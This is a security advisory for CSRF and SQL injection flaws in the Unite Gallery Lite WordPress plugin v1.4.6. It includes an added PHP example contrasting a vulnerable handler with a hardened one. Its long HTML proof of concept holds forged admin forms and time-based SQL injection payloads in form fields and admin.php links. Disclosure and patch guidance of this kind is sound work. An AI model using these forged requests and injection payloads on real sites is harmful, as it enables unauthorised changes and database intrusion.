WordPress Plugin Unite Gallery Lite 1.4.6 – Multiple Vulnerabilities

• Author: Nitin Venkatesh
• Date: 2015-07-27
• Source: https://www.exploit-db.com/exploits/37705/
# Title: Cross-Site Request Forgery & SQL Injection Vulnerabilities in Unite Gallery Lite WordPress Plugin v1.4.6
# Submitter: Nitin Venkatesh
# Product: Unite Gallery Lite WordPress Plugin
# Product URL: https://wordpress.org/plugins/unite-gallery-lite/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
# Affected Versions: v1.4.6 and possibly below.
# Tested versions: v1.4.6
# Fixed Version: v1.5
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1178586/unite-gallery-lite
# Changelog: https://wordpress.org/plugins/unite-gallery-lite/changelog/
# CVE Status: New & Unassigned

## Product Information:

The Unite Gallery is an all-in-one image and video gallery for WordPress.

## Vulnerability Description:

The admin forms of the Unite Gallery Lite WordPress Plugin are susceptible to CSRF. Additionally, the following parameters were found to be susceptible to SQLi -

Form submitted to /wp-admin/admin-ajax.php:
- data[galleryID]

Form submitted to /wp-admin/admin.php:
- galleryid
- id
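
The two weaknesses listed above, a state-changing admin handler reachable without proof of user intent (CSRF) and an id parameter copied from the request straight into SQL, have a standard shape in WordPress plugins, and so does the fix. The PHP below is an added illustration written for this page; it is not code from Unite Gallery Lite or from its v1.5 changeset (the linked diff shows the plugin's real change). The function names, the `ug_galleries` and `ug_items` table names, the `ug_example_admin` nonce action and the `manage_options` capability are assumptions made for the example; only the WordPress API calls (`check_ajax_referer`, `current_user_can`, `absint`, `$wpdb->prepare`, `wp_send_json_success`/`wp_send_json_error`, `wp_nonce_field`) are real. It places the vulnerable pattern beside a hardened handler that verifies a nonce, checks capability, coerces the id to an integer and binds it in a prepared query, and applies the same coercion to the `galleryid` query-string parameter of the admin.php views.

```php
<?php
/*
 * Added illustration for this advisory, NOT code from the Unite Gallery Lite
 * plugin or its v1.5 fix. Function, table, nonce and capability names below
 * are assumptions; the WordPress API calls are real.
 */

/* Pattern with both weaknesses the advisory describes (illustrative). */
function ug_example_get_gallery_vulnerable() {
    global $wpdb;
    // No nonce check: a hidden form on any site the logged-in admin visits
    // can submit this request in the admin's session (CSRF).
    $gallery_id = $_POST['data']['galleryID'];
    // Untrusted value concatenated into SQL: whatever follows the number is
    // executed as SQL, which is why a time-based probe makes the page stall.
    return $wpdb->get_row("SELECT * FROM {$wpdb->prefix}ug_galleries WHERE id = $gallery_id");
}

/*
 * Read a row id from a request array and reduce it to a non-negative integer.
 * absint() keeps only the leading number ("1 AND (SELECT ...)" becomes 1), so
 * nothing but an integer can ever reach the query; 0 means missing/invalid.
 */
function ug_example_read_id(array $source, $key) {
    return isset($source[$key]) ? absint($source[$key]) : 0;
}

/* Hardened AJAX handler for the data[galleryID] parameter. */
function ug_example_get_gallery_hardened() {
    global $wpdb;

    // 1. CSRF: the request must carry a nonce minted for this action and the
    //    current user; on failure check_ajax_referer() ends the request.
    check_ajax_referer('ug_example_admin', 'nonce');

    // 2. Authorisation: a valid nonce proves intent, not privilege
    //    (capability name is an assumption for the example).
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient privileges', 403);
    }

    // 3. Typing: the id is an integer, so make it one before any SQL is built.
    $data       = (isset($_POST['data']) && is_array($_POST['data'])) ? $_POST['data'] : array();
    $gallery_id = ug_example_read_id($data, 'galleryID');
    if ($gallery_id === 0) {
        wp_send_json_error('invalid gallery id', 400);
    }

    // 4. Parameterised query as defence in depth: %d binds an integer even if
    //    a later refactor weakens step 3.
    $row = $wpdb->get_row(
        $wpdb->prepare("SELECT * FROM {$wpdb->prefix}ug_galleries WHERE id = %d", $gallery_id)
    );
    wp_send_json_success($row);
}
add_action('wp_ajax_unitegallery_ajax_action', 'ug_example_get_gallery_hardened');

/*
 * The admin.php views read galleryid / id from the query string; the same
 * coercion and prepared query apply there (assumed view helper name).
 */
function ug_example_items_view_rows() {
    global $wpdb;
    $gallery_id = ug_example_read_id($_GET, 'galleryid');
    if ($gallery_id === 0) {
        wp_die('invalid gallery id', '', array('response' => 400));
    }
    return $wpdb->get_results(
        $wpdb->prepare("SELECT * FROM {$wpdb->prefix}ug_items WHERE gallery_id = %d", $gallery_id)
    );
}

/*
 * The plugin's own admin form must emit the matching nonce field, e.g. with
 *   wp_nonce_field('ug_example_admin', 'nonce');
 * and the JavaScript that builds the AJAX request has to send it as "nonce".
 * A forged form on a third-party origin cannot read that value, which is what
 * turns the CSRF into a rejected request.
 */
```

The order of the checks matters: the nonce check runs first so that a forged request is rejected before any input is parsed, the capability check stops a low-privilege user who has a valid nonce from reaching the query, and `absint()` plus `%d` together mean the `galleryID` value can only ever be an integer by the time SQL is built.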
    
## Proof of Concept:

<!DOCTYPE html>
<html>
<head>
<title>CSRF + SQLi in Unite Gallery Lite WordPress Plugin v1.4.6</title>
</head>
<body>
<h1>CSRF + SQLi in Unite Gallery Lite WordPress Plugin v1.4.6</h1>
<p>CSRF - Create Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='create_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][category]" value='new' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="submit" value="submit" />
</form>

<p>CSRF + SQLi - Update Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='update_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][shortcode]" value='[unitegallery test2]' />
<input type="hidden" name="data[main][category]" value='3' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="hidden" name="data[main][gallery_min_width]" value='150' />
<input type="hidden" name="data[params][tile_width]" value='160' />
<input type="hidden" name="data[params][tile_height]" value='160' />
<input type="hidden" name="data[params][theme_gallery_padding]" value='0' />
<input type="hidden" name="data[params][theme_carousel_align]" value='center' />
<input type="hidden" name="data[params][theme_carousel_offset]" value='0' />
<input type="hidden" name="data[params][gallery_shuffle]" value='false' />
<input type="hidden" name="data[params][tile_image_resolution]" value='medium' />
<input type="hidden" name="data[params][carousel_padding]" value='8' />
<input type="hidden" name="data[params][carousel_space_between_tiles]" value='20' />
<input type="hidden" name="data[params][carousel_scroll_duration]" value='500' />
<input type="hidden" name="data[params][carousel_scroll_easing]" value='easeOutCubic' />
<input type="hidden" name="data[params][carousel_autoplay]" value='true' />
<input type="hidden" name="data[params][carousel_autoplay_timeout]" value='3000' />
<input type="hidden" name="data[params][carousel_autoplay_direction]" value='right' />
<input type="hidden" name="data[params][carousel_autoplay_pause_onhover]" value='true' />
<input type="hidden" name="data[params][theme_enable_navigation]" value='true' />
<input type="hidden" name="data[params][theme_navigation_enable_play]" value='true' />
<input type="hidden" name="data[params][theme_navigation_align]" value='center' />
<input type="hidden" name="data[params][theme_navigation_offset_hor]" value='0' />
<input type="hidden" name="data[params][theme_navigation_position]" value='bottom' />
<input type="hidden" name="data[params][theme_navigation_margin]" value='20' />
<input type="hidden" name="data[params][theme_space_between_arrows]" value='5' />
<input type="hidden" name="data[params][carousel_navigation_numtiles]" value='3' />
<input type="hidden" name="data[params][position]" value='center' />
<input type="hidden" name="data[params][margin_top]" value='0' />
<input type="hidden" name="data[params][margin_bottom]" value='0' />
<input type="hidden" name="data[params][margin_left]" value='0' />
<input type="hidden" name="data[params][margin_right]" value='0' />
<input type="hidden" name="data[params][tile_enable_action]" value='true' />
<input type="hidden" name="data[params][tile_as_link]" value='false' />
<input type="hidden" name="data[params][tile_link_newpage]" value='true' />
<input type="hidden" name="data[params][tile_enable_border]" value='true' />
<input type="hidden" name="data[params][tile_border_width]" value='3' />
<input type="hidden" name="data[params][tile_border_color]" value='#f0f0f0' />
<input type="hidden" name="data[params][tile_border_radius]" value='0' />
<input type="hidden" name="data[params][tile_enable_outline]" value='true' />
<input type="hidden" name="data[params][tile_outline_color]" value='#8b8b8b' />
<input type="hidden" name="data[params][tile_enable_shadow]" value='false' />
<input type="hidden" name="data[params][tile_shadow_h]" value='1' />
<input type="hidden" name="data[params][tile_shadow_v]" value='1' />
<input type="hidden" name="data[params][tile_shadow_blur]" value='3' />
<input type="hidden" name="data[params][tile_shadow_spread]" value='2' />
<input type="hidden" name="data[params][tile_shadow_color]" value='#8b8b8b' />
<input type="hidden" name="data[params][tile_enable_image_effect]" value='false' />
<input type="hidden" name="data[params][tile_image_effect_type]" value='bw' />
<input type="hidden" name="data[params][tile_image_effect_reverse]" value='false' />
<input type="hidden" name="data[params][tile_enable_overlay]" value='true' />
<input type="hidden" name="data[params][tile_overlay_opacity]" value='0.4' />
<input type="hidden" name="data[params][tile_overlay_color]" value='#000000' />
<input type="hidden" name="data[params][tile_enable_icons]" value='true' />
<input type="hidden" name="data[params][tile_show_link_icon]" value='false' />
<input type="hidden" name="data[params][tile_space_between_icons]" value='26' />
<input type="hidden" name="data[params][tile_enable_textpanel]" value='false' />
<input type="hidden" name="data[params][tile_textpanel_source]" value='title' />
<input type="hidden" name="data[params][tile_textpanel_always_on]" value='false' />
<input type="hidden" name="data[params][tile_textpanel_appear_type]" value='slide' />
<input type="hidden" name="data[params][tile_textpanel_padding_top]" value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_bottom]" value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_left]" value='11' />
<input type="hidden" name="data[params][tile_textpanel_padding_right]" value='11' />
<input type="hidden" name="data[params][tile_textpanel_bg_color]" value='#000000' />
<input type="hidden" name="data[params][tile_textpanel_bg_opacity]" value='0.6' />
<input type="hidden" name="data[params][tile_textpanel_title_color]" value='#ffffff' />
<input type="hidden" name="data[params][tile_textpanel_title_text_align]" value='left' />
<input type="hidden" name="data[params][tile_textpanel_title_font_size]" value='14' />
<input type="hidden" name="data[params][tile_textpanel_title_bold]" value='true' />
<input type="hidden" name="data[params][lightbox_type]" value='wide' />
<input type="hidden" name="data[params][lightbox_hide_arrows_onvideoplay]" value='true' />
<input type="hidden" name="data[params][lightbox_slider_control_zoom]" value='true' />
<input type="hidden" name="data[params][gallery_mousewheel_role]" value='zoom' />
<input type="hidden" name="data[params][lightbox_overlay_opacity]" value='1' />
<input type="hidden" name="data[params][lightbox_overlay_color]" value='#000000' />
<input type="hidden" name="data[params][lightbox_top_panel_opacity]" value='0.4' />
<input type="hidden" name="data[params][lightbox_show_numbers]" value='true' />
<input type="hidden" name="data[params][lightbox_numbers_size]" value='14' />
<input type="hidden" name="data[params][lightbox_numbers_color]" value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_show_textpanel]" value='true' />
<input type="hidden" name="data[params][lightbox_textpanel_width]" value='550' />
<input type="hidden" name="data[params][lightbox_textpanel_source]" value='title' />
<input type="hidden" name="data[params][lightbox_textpanel_title_color]" value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_textpanel_title_text_align]" value='left' />
<input type="hidden" name="data[params][lightbox_textpanel_title_font_size]" value='14' />
<input type="hidden" name="data[params][lightbox_textpanel_title_bold]" value='false' />
<input type="hidden" name="data[params][lightbox_compact_overlay_opacity]" value='0.6' />
<input type="hidden" name="data[params][lightbox_compact_overlay_color]" value='#000000' />
<input type="hidden" name="data[params][lightbox_arrows_position]" value='sides' />
<input type="hidden" name="data[params][lightbox_arrows_inside_alwayson]" value='false' />
<input type="hidden" name="data[params][lightbox_compact_show_numbers]" value='true' />
<input type="hidden" name="data[params][lightbox_compact_numbers_size]" value='14' />
<input type="hidden" name="data[params][lightbox_compact_numbers_color]" value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_compact_numbers_padding_top]" value='7' />
<input type="hidden" name="data[params][lightbox_compact_numbers_padding_right]" value='5' />
<input type="hidden" name="data[params][lightbox_compact_show_textpanel]" value='true' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_source]" value='title' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_title_color]" value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_title_font_size]" value='14' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_title_bold]" value='false' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_padding_top]" value='5' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_padding_left]" value='10' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_padding_right]" value='10' />
<input type="hidden" name="data[params][lightbox_compact_slider_image_border]" value='true' />
<input type="hidden" name="data[params][lightbox_compact_slider_image_border_width]" value='10' />
<input type="hidden" name="data[params][lightbox_compact_slider_image_border_color]" value='#ffffff' />
<input type="hidden" name="data[params][lightbox_compact_slider_image_border_radius]" value='0' />
<input type="hidden" name="data[params][lightbox_compact_slider_image_shadow]" value='true' />
<input type="hidden" name="data[params][include_jquery]" value='true' />
<input type="hidden" name="data[params][js_to_body]" value='false' />
<input type="hidden" name="data[params][compress_output]" value='false' />
<input type="hidden" name="data[params][gallery_debug_errors]" value='false' />

<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>

<p>CSRF - Add Items</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='add_item' />
<input type="hidden" name="gallery_type" value='' />
<input type="hidden" name="data[type]" value='html5video' />
<input type="hidden" name="data[title]" value='test' />
<input type="hidden" name="data[description]" value='' />
<input type="hidden" name="data[urlImage]" value='' />
<input type="hidden" name="data[urlThumb]" value='' />
<input type="hidden" name="data[urlVideo_mp4]" value='http://video-js.zencoder.com/oceans-clip.mp4' />
<input type="hidden" name="data[urlVideo_webm]" value='http://video-js.zencoder.com/oceans-clip.webm' />
<input type="hidden" name="data[urlVideo_ogv]" value='http://video-js.zencoder.com/oceans-clip.ogv' />
<input type="hidden" name="data[catID]" value='4' />
<input type="submit" value="submit" />
</form>

<p>CSRF + SQLi - Retrieve Items (Edit Settings - Items Tab)</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='get_cat_items' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[catID]" value='3' />

<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>

<p>CSRF + SQLi - Action buttons</p>
<ul>
<li><a href="http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)">http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)</a></li>
<li><a href="http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)">http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)</a></li>
</ul>
</body>
</html>

## Solution:

Upgrade to v1.5 or higher.

## Disclosure Timeline:

2015-06-06 - Discovered. Reported to developer.
2015-06-10 - Updated version released.
2015-07-25 - Publishing disclosure on FD mailing list

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.